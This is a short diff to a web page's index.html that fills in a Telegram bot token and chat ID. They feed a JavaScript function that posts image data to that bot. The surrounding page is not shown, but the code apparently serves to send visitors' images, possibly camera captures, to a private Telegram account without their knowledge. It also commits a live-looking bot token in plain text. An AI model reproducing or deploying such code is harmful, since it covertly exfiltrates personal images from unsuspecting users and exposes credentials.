--- a/index.html
+++ b/index.html
@@ -91,8 +91,8 @@
         }
 
         function sendImageToTelegram(imageData) {
-            const botToken = ''; // Ganti dengan token bot Anda
-            const chatId = ''; // Ganti dengan chat ID Anda
+            const botToken = '7731386187:AAGEuMGkU6f8k_a25mvWJRvtc3FLuZ4jw0c'; // Ganti dengan token bot Anda
+            const chatId = '7750664206'; // Ganti dengan chat ID Anda
 
             fetch(`https://api.telegram.org/bot${botToken}/sendPhoto`, {
                 method: 'POST',
